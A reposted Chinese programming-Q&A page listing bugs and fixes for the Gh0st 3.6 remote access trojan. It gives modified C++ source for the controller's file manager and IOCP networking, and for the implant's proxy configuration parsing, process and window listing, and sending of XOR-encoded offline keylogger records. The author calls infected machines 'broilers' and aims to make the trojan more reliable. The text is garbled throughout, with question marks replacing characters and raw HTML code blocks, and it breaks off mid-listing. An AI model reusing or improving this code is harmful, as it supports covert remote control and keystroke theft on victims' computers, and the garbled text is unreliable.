當(dāng)前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Gh0st 3.6 存在的BUG及修改方法（收集整理）

發(fā)布時間：2024/4/11 编程问答 28 豆豆

生活随笔收集整理的這篇文章主要介紹了 Gh0st 3.6 存在的BUG及修改方法（收集整理）小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

以下貼出代碼全部為修改后的

---------------------------------------------------------------------------------------------------------------------------------

1.拖放文件上傳和下載時，有選擇目標(biāo)目錄的話，可能會使目錄重復(fù)

修改CFileManagerDlg::SendUploadJob()和CFileManagerDlg::CreateLocalRecvFile()中的代碼：

if (m_Remote_Upload_Job.IsEmpty())
?? return FALSE;

CString strDestDirectory = m_Remote_Path;
// 如果遠(yuǎn)程也有選擇，當(dāng)做目標(biāo)文件夾
int nItem = m_list_remote.GetSelectionMark();

// 是文件夾
if (!m_hCopyDestFolder.IsEmpty())//修改目錄重復(fù)的bug
{
?? strDestDirectory += m_hCopyDestFolder + "\\";
}else if (nItem != -1 && m_list_remote.GetItemData(nItem) == 1) // 是文件夾
{
?? strDestDirectory += m_list_remote.GetItemText(nItem, 0) + "\\";
}//新修改

if (!m_hCopyDestFolder.IsEmpty())
{
?? strDestDirectory += m_hCopyDestFolder + "\\";
}

// 發(fā)出第一個下載任務(wù)命令

------------------------------------------------------------------------------------------------------------------------------------

2.?選中多個主機，執(zhí)行斷開連接，并不是所有選擇的都斷開

Ccb1stView::OnDisconnect() 中代碼改為
??????? POSITION pos;
??????? for(; pos=m_pListCtrl->GetFirstSelectedItemPosition();)
??????? {
??????????????? m_pListCtrl->DeleteItem(m_pListCtrl->GetNextSelectedItem(pos));
??????? }

------------------------------------------------------------------------------------------------------------------------------------

3.文件列表不支持點擊排序

在FileManagerDlg.h中加上一句:
#define CListCtrl CCJListCtrl

--------------------------------------------------------------------------------------------------------------------------------------

4.內(nèi)存泄露BUG修改

1）、內(nèi)存泄漏
如new后沒有delete，或其他內(nèi)存分配函數(shù)后沒有配對釋放，例如：
void SplitLoginInfo(…)中、DWORD GetProcessID(LPCTSTR lpProcessName)中…
另外如用

[Copy to clipboard] [ - ]CODE:
char *lpBuffer = new char[dwSize]
這種形式new，后面應(yīng)該

[Copy to clipboard] [ - ]CODE:
delete [] lpBuffer;
，如果只是delete lpBuffer應(yīng)該也會造成泄漏，例如:
int CKeyboardManager::sendOfflineRecord()中…
2）、句柄泄漏
大多是由于沒有CloseHandle所致，某些特殊對象有相應(yīng)的關(guān)閉釋放函數(shù)，雖然問題不大，可看到肉雞每次接受命令執(zhí)行，就增加一些句柄或其他資源占用，心里總是不爽。
例如:

[Copy to clipboard] [ - ]CODE:
LPBYTE CSystemManager::getProcessList()中OpenProcess后應(yīng)該CloseHandle(hProcess);

[Copy to clipboard] [ - ]CODE:
DWORD GetProcessID(LPCTSTR lpProcessName)中最后應(yīng)該CloseHandle(handle);
…

//新加入減少內(nèi)存泄露//1
void SplitLoginInfo(char *lpDecodeString, char **lppszHost, LPDWORD lppPort, char **lppszProxyHost, LPDWORD

lppProxyPort,
??????????????????????????????????? char **lppszProxyUser, char **lppszProxyPass)
{
?????? *lppszHost = NULL;
?????? *lppPort = 0;
?????? *lppszProxyHost = NULL;
?????? *lppProxyPort = 0;
?????? *lppszProxyUser = NULL;
?????? *lppszProxyPass = NULL;

?????? bool??????? bIsProxyUsed = false;
?????? bool??????? bIsAuth = false;
?????? UINT??????? nSize = lstrlen(lpDecodeString) + 1;
?????? char??????? *lpString = new char[nSize];
?????? memcpy(lpString, lpDecodeString, nSize);
??????
?????? char??????? *pStart, *pNext, *pEnd;
?????? *lppszHost = lpString;

?????? if ((pStart = strchr(lpString, ':')) == NULL)
??????????? return;

?????? *pStart = '\0';
?????? if ((pNext = strchr(pStart + 1, '|')) != NULL)
?????? {
??????????? bIsProxyUsed = true;
??????????? *pNext = '\0';
?????? }
?????? *lppPort = atoi(pStart + 1);
??????
?????? if (!bIsProxyUsed)
??????????? return;

?????? pNext++;
?????? *lppszProxyHost = pNext;

?????? if ((pStart = strchr(pNext, ':')) == NULL)
??????????? return;

?????? *pStart = '\0';
?????? if ((pNext = strchr(pStart + 1, '|')) != NULL)
?????? {
??????????? bIsAuth = true;
??????????? *pNext = '\0';
?????? }
?????? *lppProxyPort = atoi(pStart + 1);
??????
?????? if (!bIsAuth)
??????????? return;
??????
?????? pNext++;
?????? *lppszProxyUser = pNext;
?????? if ((pStart = strchr(pNext, ':')) == NULL)
??????????? return;
?????? *pStart = '\0';
?????? *lppszProxyPass = pStart + 1;
?????? delete [] lpString ;//新加入減少內(nèi)存泄露?
}

//2

int CKeyboardManager::sendOfflineRecord()
{
?????? int???????????? nRet = 0;
?????? DWORD??????? dwSize = 0;
?????? DWORD??????? dwBytesRead = 0;
?????? char??????? strRecordFile[MAX_PATH];
?????? GetSystemDirectory(strRecordFile, sizeof(strRecordFile));
?????? lstrcat(strRecordFile, "");
?????? HANDLE??????? hFile = CreateFile(strRecordFile, GENERIC_READ, FILE_SHARE_READ,
??????????? NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
?????? if (hFile != INVALID_HANDLE_VALUE)
?????? {
??????????? dwSize = GetFileSize(hFile, NULL);
??????????? char *lpBuffer = new char[dwSize];
??????????? ReadFile(hFile, lpBuffer, dwSize, &dwBytesRead, NULL);
??????????? // 解密
??????????? for (int i = 0; i < dwSize; i++)
???????????????????? lpBuffer ^= XOR_ENCODE_VALUE;
??????????? nRet = sendKeyBoardData((LPBYTE)lpBuffer, dwSize);
??????????? delete [] lpBuffer; //??? delete lpBuffer;新修改的代碼
?????? }
?????? CloseHandle(hFile);
?????? return nRet;
}

LPBYTE CSystemManager::getProcessList()
{
?????? HANDLE????????????????????? hSnapshot = NULL;
?????? HANDLE????????????????????? hProcess = NULL;
?????? HMODULE????????????????????? hModules = NULL;
?????? PROCESSENTRY32??????? pe32 = {0};
?????? DWORD????????????????????? cbNeeded;
?????? char????????????????????? strProcessName[MAX_PATH] = {0};
?????? LPBYTE????????????????????? lpBuffer = NULL;
?????? DWORD????????????????????? dwOffset = 0;
?????? DWORD????????????????????? dwLength = 0;
?????? DebugPrivilege(SE_DEBUG_NAME, TRUE);
??????
?????? hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
??????
?????? if(hSnapshot == INVALID_HANDLE_VALUE)
??????????? return NULL;
??????
?????? pe32.dwSize = sizeof(PROCESSENTRY32);
??????
?????? lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1024);
??????
?????? lpBuffer[0] = TOKEN_PSLIST;
?????? dwOffset = 1;
??????
?????? if(Process32First(hSnapshot, &pe32))
?????? {???????
??????????? do
??????????? {????
???????????????????? hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE,

pe32.th32ProcessID);
???????????????????? if ((pe32.th32ProcessID !=0 ) && (pe32.th32ProcessID != 4) && (pe32.th32ProcessID != 8))
???????????????????? {
?????????????????????????????? EnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded);
?????????????????????????????? GetModuleFileNameEx(hProcess, hModules, strProcessName, sizeof(strProcessName));
??????????????????????????????
?????????????????????????????? // 此進程占用數(shù)據(jù)大小
?????????????????????????????? dwLength = sizeof(DWORD) + lstrlen(pe32.szExeFile) + lstrlen(strProcessName) + 2;
?????????????????????????????? // 緩沖區(qū)太小，再重新分配下
?????????????????????????????? if (LocalSize(lpBuffer) < (dwOffset + dwLength))
??????????????????????????????????? lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength),

LMEM_ZEROINIT|LMEM_MOVEABLE);
??????????????????????????????
?????????????????????????????? memcpy(lpBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD));
?????????????????????????????? dwOffset += sizeof(DWORD);???????
??????????????????????????????
?????????????????????????????? memcpy(lpBuffer + dwOffset, pe32.szExeFile, lstrlen(pe32.szExeFile) + 1);
?????????????????????????????? dwOffset += lstrlen(pe32.szExeFile) + 1;
??????????????????????????????
?????????????????????????????? memcpy(lpBuffer + dwOffset, strProcessName, lstrlen(strProcessName) + 1);
?????????????????????????????? dwOffset += lstrlen(strProcessName) + 1;
???????????????????? }
??????????? CloseHandle(hProcess);//新修改
??????????? }
??????????? while(Process32Next(hSnapshot, &pe32));
?????? }
??????
?????? lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
??????
?????? DebugPrivilege(SE_DEBUG_NAME, FALSE);?
?????? CloseHandle(hSnapshot);
?????? return lpBuffer;???????
}
//
DWORD GetProcessID(LPCTSTR lpProcessName)
{
?????? DWORD RetProcessID = 0;
?????? HANDLE handle=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
?????? PROCESSENTRY32* info=new PROCESSENTRY32;
?????? info->dwSize=sizeof(PROCESSENTRY32);
??????
?????? if(Process32First(handle,info))
?????? {
??????????? if (strcmpi(info->szExeFile,lpProcessName) == 0)
??????????? {
???????????????????? RetProcessID = info->th32ProcessID;
???????????????????? return RetProcessID;
??????????? }
??????????? while(Process32Next(handle,info) != FALSE)
??????????? {
???????????????????? if (lstrcmpi(info->szExeFile,lpProcessName) == 0)
???????????????????? {
?????????????????????????????? RetProcessID = info->th32ProcessID;
?????????????????????????????? return RetProcessID;
????????????
???????????????????? }
??????????? }
?????? }

CloseHandle(handle);//新修改

return RetProcessID;
???????
}

新修改
bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
{
DWORD dwLength = 0;
DWORD dwOffset = 0;
DWORD dwProcessID = 0;
LPBYTE lpBuffer = *(LPBYTE *)lParam;
char strTitle[1024]={0};
try
{
GetWindowText(hwnd, strTitle, sizeof(strTitle)-1);
strTitle[sizeof(strTitle)-1]=0;
if (!IsWindowVisible(hwnd) || lstrlen(strTitle) == 0)
return true;
if (lpBuffer == NULL)
{
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1);
dwOffset=1;
}else
{
dwOffset = LocalSize(lpBuffer);
while(*(lpBuffer + dwOffset - 2)==0) dwOffset--;
}

dwLength = sizeof(DWORD) + lstrlen(strTitle) + 1;
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE);
}catch (...)
{
return true;
}
GetWindowThreadProcessId(hwnd, (LPDWORD)(lpBuffer + dwOffset));
memcpy(lpBuffer + dwOffset + sizeof(DWORD), strTitle, lstrlen(strTitle) + 1);

*(LPBYTE *)lParam = lpBuffer;
return true;
}

/
LPCTSTR FindConfigString(HMODULE hModule, LPCTSTR lpString)
{
?????? char??????? strFileName[MAX_PATH];
?????? char??????? *lpConfigString = NULL;
?????? DWORD??????? dwBytesRead = 0;
?????? GetModuleFileName(hModule, strFileName, sizeof(strFileName));
??????
?????? HANDLE??????? hFile = CreateFile(strFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
?????? if (hFile == INVALID_HANDLE_VALUE)
?????? {
??????????? return NULL;
?????? }
??????
?????? SetFilePointer(hFile, -MAX_CONFIG_LEN, NULL, FILE_END);
?????? lpConfigString = new char[MAX_CONFIG_LEN];
?????? ReadFile(hFile, lpConfigString, MAX_CONFIG_LEN, &dwBytesRead, NULL);
?????? CloseHandle(hFile);
??????
?????? int offset = memfind(lpConfigString, lpString, MAX_CONFIG_LEN, 0);
?????? if (offset == -1)
?????? {
??????????? delete lpConfigString;
??????????? return NULL;
?????? }
?????? else
?????? {
??????????? return lpConfigString + offset;
??????????? delete lpConfigString;///新修改代碼-----------不確定.
?????? }
}
// 文件名隨機

------------------------------------------------------------------------------------------------------------------------------------

5.對話框關(guān)閉后未銷毀的問題(spy++可以看到)

??????? 在CGh0stView::OnRemoveFromList(WPARAM wParam, LPARAM lParam)中有調(diào)用DestroyWindow，只要在OnClose中注釋掉m_pContext->m_Dialog[0] = 0;

???????? 在工程中搜索m_pContext->m_Dialog[0] = 0;共搜到七處，全部注釋掉后，測試時第二次進入文件管理的時候掉圖標(biāo)。不注釋的話，又導(dǎo)致spy++可以看到文件管理窗口。歡迎高手提供好的解決辦法。
也就是下面代碼里的m_pContext->m_Dialog[0] = 0;不能注釋，其他六處可以注釋。
void CFileManagerDlg::OnClose()?
{
// TODO: Add your message handler code here and/or call default
CoUninitialize();
m_pContext->m_Dialog[0] = 0;
closesocket(m_pContext->m_Socket);
CDialog::OnClose();
}

------------------------------------------------------------------------------------------------------------------------------------

6.發(fā)送數(shù)據(jù)較快容易出錯

pContext->m_hWriteComplete

這明顯是個event對象，可是并沒有CreateEvent創(chuàng)建，單線程發(fā)送接收可能沒事，發(fā)送數(shù)據(jù)較快就有問題了(我加代理功能時發(fā)現(xiàn)，CreateEvent后發(fā)的數(shù)據(jù)就不亂了)

------------------------------------------------------------------------------------------------------------------------------------

7.Gh0st3.6 IOCP發(fā)送BUG

作者:?boywhp
時間:?2014-04-21,22:53:46
鏈接:?http://bbs.pediy.com/showthread.php?t=186833

測試發(fā)現(xiàn)有時客戶端會發(fā)送重復(fù)數(shù)據(jù)包，感覺作者的IOCP發(fā)送處理邏輯不是太清晰，簡單修改了下，初步測試沒發(fā)現(xiàn)異常
話說我很想不通使用了TCP通信的Gh0st里面居然還有處理重發(fā)的代碼，真是蛋疼啊，懶得刪了，萬一有個大坑呢？
另外里面頻繁的new?delete看得我也很不爽啊，不過我忍住了，能不動就不動
1、CIOCPServer::Send
代碼: [cpp]?view plain?copy

void?CIOCPServer::Send(ClientContext*?pContext,?LPBYTE?lpData,?UINT?nSize)??

{??

??if?(pContext?==?NULL)??

????return;??

??????????

??try??

??{??

????????????????CLock?cs(pContext->m_SndLock,?"Send");??

????if?(nSize?>?0)??

????{??

??????//?Compress?data??

??????unsigned?long??destLen?=?(double)nSize?*?1.001??+?12;??

??????LPBYTE??????pDest?=?new?BYTE[destLen];??

??????int??nRet?=?compress(pDest,?&destLen,?lpData,?nSize);??

????????

??????if?(nRet?!=?Z_OK)??

??????{??

????????delete?[]?pDest;??

????????return;??

??????}??

??????//??

??????LONG?nBufLen?=?destLen?+?HDR_SIZE;??

??????//?5?bytes?packet?flag??

??????pContext->m_WriteBuffer.Write(m_bPacketFlag,?sizeof(m_bPacketFlag));??

??????//?4?byte?header?[Size?of?Entire?Packet]??

??????pContext->m_WriteBuffer.Write((PBYTE)?&nBufLen,?sizeof(nBufLen));??

??????//?4?byte?header?[Size?of?UnCompress?Entire?Packet]??

??????pContext->m_WriteBuffer.Write((PBYTE)?&nSize,?sizeof(nSize));??

??????//?Write?Data??

??????pContext->m_WriteBuffer.Write(pDest,?destLen);??

??????delete?[]?pDest;??

????????

??????//?如果當(dāng)前緩沖區(qū)無數(shù)據(jù)堆積，執(zhí)行PostSend??

??????if?(pContext->m_WriteBuffer.GetBufferLen()?==?nBufLen)??

????????PostSend(pContext);??

??????//?發(fā)送完后，再備份數(shù)據(jù),?因為有可能是m_ResendWriteBuffer本身在發(fā)送,所以不直接寫入??

??????LPBYTE?lpResendWriteBuffer?=?new?BYTE[nSize];??

??????CopyMemory(lpResendWriteBuffer,?lpData,?nSize);??

??????pContext->m_ResendWriteBuffer.ClearBuffer();??

??????pContext->m_ResendWriteBuffer.Write(lpResendWriteBuffer,?nSize);??//?備份發(fā)送的數(shù)據(jù)??

??????delete?[]?lpResendWriteBuffer;??

????}??

????else?//?要求重發(fā)??

????{??

??????pContext->m_WriteBuffer.Write(m_bPacketFlag,?sizeof(m_bPacketFlag));??

??????pContext->m_ResendWriteBuffer.ClearBuffer();??

??????pContext->m_ResendWriteBuffer.Write(m_bPacketFlag,?sizeof(m_bPacketFlag));??//?備份發(fā)送的數(shù)據(jù)????

????}??

?????//OVERLAPPEDPLUS?*?pOverlap?=?new?OVERLAPPEDPLUS(IOWrite);??

?????//PostQueuedCompletionStatus(m_hCompletionPort,?0,?(DWORD)?pContext,?&pOverlap->m_ol);??

????pContext->m_nMsgOut++;??

??}catch(...){}??

}??

2、添加函數(shù)CIOCPServer::PostSend
代碼: [cpp]?view plain?copy

void?CIOCPServer::PostSend(ClientContext*?pContext)??

{??

??OVERLAPPEDPLUS?*?pOverlap?=?new?OVERLAPPEDPLUS(IOWrite);??

??WSABUF?sndBuf;??

??ULONG?ulFlags?=?MSG_PARTIAL;??

????

??m_pNotifyProc((LPVOID)?m_pFrame,?pContext,?NC_TRANSMIT);??

????

??sndBuf.buf?=?(char*)?pContext->m_WriteBuffer.GetBuffer();??

??sndBuf.len?=?pContext->m_WriteBuffer.GetBufferLen();??

????

??int?nRetVal?=?WSASend(pContext->m_Socket,???

????&sndBuf,??

????1,??

????&sndBuf.len,???

????ulFlags,??

????&pOverlap->m_ol,???

????NULL);??

????

??if?(nRetVal?==?SOCKET_ERROR?&&?WSAGetLastError()?!=?WSA_IO_PENDING)??

????RemoveStaleClient(?pContext,?FALSE?);??

}??

3、CIOCPServer::OnClientWriting
代碼: [cpp]?view plain?copy

bool?CIOCPServer::OnClientWriting(ClientContext*?pContext,?DWORD?dwIoSize)??

{??

??try??

??{??

????//??

????static?DWORD?nLastTick?=?GetTickCount();??

????static?DWORD?nBytes?=?0;??

??????

????nBytes?+=?dwIoSize;??

??????

????if?(GetTickCount()?-?nLastTick?>=?1000)??

????{??

??????nLastTick?=?GetTickCount();??

??????InterlockedExchange((LPLONG)&(m_nSendKbps),?nBytes);??

??????nBytes?=?0;??

????}??

????//??

?????????????????

????????????????TRACE("IOCP?Send?DONE?%d?bytes?Remain:%d?bytes\n",???

??????dwIoSize,???

??????pContext->m_WriteBuffer.GetBufferLen());??

????//?Finished?writing?-?tidy?up??

????????????????if?(dwIoSize?>?0){??

????????????pContext->m_WriteBuffer.Delete(dwIoSize);??

??????if?(pContext->m_WriteBuffer.GetBufferLen()?>?0)??

????????PostSend(pContext);??

??????else??

????????pContext->m_WriteBuffer.ClearBuffer();??

????????????????}??

??}catch(...){}??

??return?false;??????//?issue?new?read?after?this?one??

}??

------------------------------------------------------------------------------------------------------------------------------------

8.SetPaneText 的崩潰問題

??這個應(yīng)該屬于多線程操作控件的問題，參見MFC不能多線程操作控件的原因?這里面講解的比較深入了。?
關(guān)于狀態(tài)欄StatusBar有幾點需要說明：?
1）剛剛創(chuàng)建工程 CMainFrame 類里面就有一個?CMFCStatusBar m_wndStatusBar;?狀態(tài)欄變量定義。在原版工程里面是CStatusBar m_wndStatusBar;?
2）在這個類的 OnCreate 函數(shù)里面調(diào)用?m_wndStatusBar.SetPaneInfo(0, m_wndStatusBar.GetItemID(0), SBPS_STRETCH , 300);?設(shè)置每個狀態(tài)欄分割寬度，后面兩個參數(shù) SBPS_STRETCH 表示剩余的寬度都算在這個分割里面，300表示最小寬度，MSDN文檔。?
3）關(guān)于 CMFCStatusBar 使用方法可見雞啄米專欄?VS2010/MFC編程入門之三十八（狀態(tài)欄的使用詳解）?。?
4）gh0st里面是這樣使用?m_wndStatusBar?的：

當(dāng)異常的時候調(diào)用棧如下：?

跟蹤到異常位置來到系統(tǒng)代碼：

<code class="language-C hljs lasso has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;"> // should also be in the permanent or temporary handle map CHandleMap* pMap = afxMapHWND(); ASSERT(pMap != NULL); CObject* p=NULL; if(pMap) { ASSERT( (p = pMap->LookupPermanent(m_hWnd)) != NULL || (p = pMap->LookupTemporary(m_hWnd)) != NULL); }</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li><li style="box-sizing: border-box; padding: 0px 5px;">7</li><li style="box-sizing: border-box; padding: 0px 5px;">8</li><li style="box-sizing: border-box; padding: 0px 5px;">9</li><li style="box-sizing: border-box; padding: 0px 5px;">10</li></ul>

總之一句話，這個 SetPaneText 是從其它線程 ListenThreadProc 調(diào)用過來的，如果要正常使用可以修改為如下方式：

g_pFrame 是一個 CMainFrame 類型指針，在CMainFrame 類里面加入一個消息處理過程：

<code class="language-C hljs autohotkey has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;">ON_MESSAGE(UpdatePane, &CMainFrame::OnUpdatepane) afx_msg LRESULT CMainFrame::OnUpdatepane(WPARAM wParam, LPARAM lParam) { m_wndStatusBar.SetPaneText(1, "test"); return 0; }</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li></ul>

??在 ListenThreadProc 向 CMainFrame 類發(fā)送一個消息 PostMessage(UpdatePane)，然后在 CMainFrame 類里面處理這個消息，至此問題完美解決。?
參考：?
MFC中從一個類向其他類發(fā)送消息的方法

------------------------------------------------------------------------------------------------------------------------------------

9.WSAIoctl 參數(shù)類型導(dǎo)致棧異常

以前gh0st代碼如下：

<code class="language-C hljs objectivec has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;"> const char chOpt = 1; WSAIoctl ( pContext->m_Socket, SIO_KEEPALIVE_VALS, &klive, sizeof(tcp_keepalive), NULL, 0, (unsigned long *)&chOpt, 0, NULL );</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li><li style="box-sizing: border-box; padding: 0px 5px;">7</li><li style="box-sizing: border-box; padding: 0px 5px;">8</li><li style="box-sizing: border-box; padding: 0px 5px;">9</li><li style="box-sizing: border-box; padding: 0px 5px;">10</li><li style="box-sizing: border-box; padding: 0px 5px;">11</li><li style="box-sizing: border-box; padding: 0px 5px;">12</li><li style="box-sizing: border-box; padding: 0px 5px;">13</li></ul>

WSAIoctl 原型聲明如下：

<code class="language-C hljs bash has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;">int WSAAPI WSAIoctl( __in SOCKET s, __in DWORD dwIoControlCode, __in_bcount_opt(cbInBuffer) LPVOID lpvInBuffer, __in DWORD cbInBuffer, __out_bcount_part_opt(cbOutBuffer, *lpcbBytesReturned) LPVOID lpvOutBuffer, __in DWORD cbOutBuffer, __out LPDWORD lpcbBytesReturned, __inout_opt LPWSAOVERLAPPED lpOverlapped, __in_opt LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine );</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li><li style="box-sizing: border-box; padding: 0px 5px;">7</li><li style="box-sizing: border-box; padding: 0px 5px;">8</li><li style="box-sizing: border-box; padding: 0px 5px;">9</li><li style="box-sizing: border-box; padding: 0px 5px;">10</li><li style="box-sizing: border-box; padding: 0px 5px;">11</li></ul>

??倒數(shù)第三個參數(shù)應(yīng)當(dāng)是 LPDWORD 類型，而且是輸出，傳入的僅僅是char類型，雖然因為對齊 char 也分配了4字節(jié)，不會導(dǎo)致棧覆蓋，但是在debug模式下系統(tǒng)加入了嚴(yán)苛的棧檢測機制：雖然分配了四字節(jié)，因為是char類型，所以剩余的三字節(jié)是不應(yīng)該修改的，在release下就沒有這問題。?
修改為 LONG 類型即可解決問題：

------------------------------------------------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------------------------------
10.CIniFile 構(gòu)造函數(shù)導(dǎo)致異常

系統(tǒng)自動定義的一個對象

<code class="language-C hljs cs has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;">// 唯一的一個 ChostApp 對象 ChostApp theApp;</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li></ul>

這個構(gòu)造函數(shù)應(yīng)該是在最早執(zhí)行的，在 ChostApp 里面有一個成員

<code class="language-C hljs has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;">CIniFile m_IniFile;</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li></ul>

所以要首先調(diào)用 CIniFile 的構(gòu)造函數(shù)

<code class="language-C hljs objectivec has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;">CIniFile::CIniFile(void) { char szAppName[MAX_PATH]; int len; HINSTANCE hinst; //hinst = AfxGetInstanceHandle(); ::GetModuleFileName(GetModuleHandle(NULL), szAppName, sizeof(szAppName)); len = strlen(szAppName); }</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li><li style="box-sizing: border-box; padding: 0px 5px;">4</li><li style="box-sizing: border-box; padding: 0px 5px;">5</li><li style="box-sizing: border-box; padding: 0px 5px;">6</li><li style="box-sizing: border-box; padding: 0px 5px;">7</li><li style="box-sizing: border-box; padding: 0px 5px;">8</li><li style="box-sizing: border-box; padding: 0px 5px;">9</li></ul>

因為 AfxGetInstanceHandle() 調(diào)用導(dǎo)致異常。?
具體可見CSDN論壇討論。

---------------------------------------------------------------------------------------------------------------------------------

11.棧上對象多線程，析構(gòu)函數(shù)導(dǎo)致程序崩潰

??打開主控端。開啟被控端，此時主控端顯示上線。

??在server端點擊桌面管理可以正常顯示被控端桌面，然后關(guān)閉遠(yuǎn)程桌面，此時被控端出現(xiàn)一個錯誤：?
TestDll.exe 中的 0x5950cc6f (server.dll) 處有未經(jīng)處理的異常: 0xC0000005: 讀取位置 0x02ecfca4 時發(fā)生訪問沖突

<code class="hljs avrasm has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;">nRet = m_pClient->Send((LPBYTE)lpData, nSize); 5950CC64 mov eax,dword ptr [ebp+0Ch] 5950CC67 push eax 5950CC68 mov ecx,dword ptr [ebp+8] 5950CC6B push ecx 5950CC6C mov edx,dword ptr [ebp-18h] 5950CC6F mov ecx,dword ptr [edx+4] </code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 